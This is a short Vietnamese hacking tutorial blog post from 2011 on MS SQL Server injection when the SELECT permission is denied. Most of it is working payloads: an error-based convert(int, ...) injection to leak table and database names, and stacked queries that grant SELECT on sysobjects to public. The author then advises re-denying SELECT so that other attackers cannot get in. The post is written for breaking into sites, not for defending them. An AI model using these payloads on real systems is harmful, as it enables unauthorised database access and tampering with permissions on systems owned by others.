Saturday, July 9, 2011

[Tut] hack sql injection bị deny SELECT

bình thường khi query
Trích:
convert(int,(select top 1 table_name from information_schema.tables))--[
bay ra lỗi
Trích:
Syntax error converting the nvarchar value 'table_name' to a column of data type int[/b]
nhưng nếu bay ra lỗi
Trích:
SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'.
thường anh em bỏ nó or toàn chơi tool thấy ko query dc bỏ luôn.
thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j` .
dùng query sau:
Trích:
;use dataname grant keyword on tables to public
trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vnc
query fat nào
Trích:
;use vnc grant select on sysobjects to public--
hack xong ta lại denycái select cho thằng vịt khác ko hack dc nữa

n

No comments:

Post a Comment